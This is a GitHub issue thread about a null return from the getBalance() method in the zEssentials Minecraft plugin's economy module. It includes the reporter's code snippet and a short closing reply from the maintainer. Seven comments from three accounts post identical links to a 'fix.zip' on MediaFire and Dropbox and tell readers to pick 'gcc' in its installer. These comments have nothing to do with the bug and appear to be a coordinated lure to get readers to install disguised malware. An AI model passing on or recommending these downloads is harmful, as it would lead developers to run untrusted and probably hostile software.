### ISSUE TITLE
[BUG] API economy getBalance() always null

### ISSUE THREAD

**Issue by DxrkCat** [Maxlego08/zEssentials#66]
### Terms

- [X] I'm using the very latest version of zEssentials and its dependencies (zMenu and PlaceholdersAPI).
- [X] I am sure this is a bug and it is not caused by a misconfiguration or by another plugin.
- [X] I've looked for already existing issues on the [Issue Tracker](https://github.com/Maxlego08/zEssentials/issues) and haven't found any.
- [X] I already searched on the [plugin wiki](https://zessentials.groupez.dev/) to know if a solution is already known.
- [X] I already searched on the [discord](https://discord.groupez.dev/) to check if anyone already has a solution for this.
- [X] I tested this with just zEssentials and its dependencies and with a vanilla client of the same version as the Server.
- [X] I enabled the debug mode in config.yml and sql debug

### Server Version

1.21

### Server Software

Purpur

### zEssentials Version

1.0.0.7

### zMenu Version

1.0.3.4

### What happened?

https://github.com/Maxlego08/zEssentials/blob/e2e4f08b3a7a19ddc6e798b3161b2da272c3eb5c/src/main/java/fr/maxlego08/essentials/economy/EconomyModule.java#L142

### Steps to reproduce the issue

https://github.com/Maxlego08/zEssentials/blob/e2e4f08b3a7a19ddc6e798b3161b2da272c3eb5c/src/main/java/fr/maxlego08/essentials/economy/EconomyModule.java#L142

### Full Server Log

null

**Comment by DxrkCat** [comment]
```
    @Override
    public BigDecimal getBalance(OfflinePlayer player, Economy economy) {
        if (player.isOnline()) {
            User user = plugin.getStorageManager().getStorage().getUser(player.getUniqueId());
            if (user != null) {
                return user.getBalance(economy);
            }
        } else {
            OfflineEconomy offlineEconomy = getOfflineEconomy(player.getUniqueId());
            return offlineEconomy.getEconomy(economy.getName());
        }
        return BigDecimal.ZERO; 
    }
```

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Maxlego08** [comment]
Done !
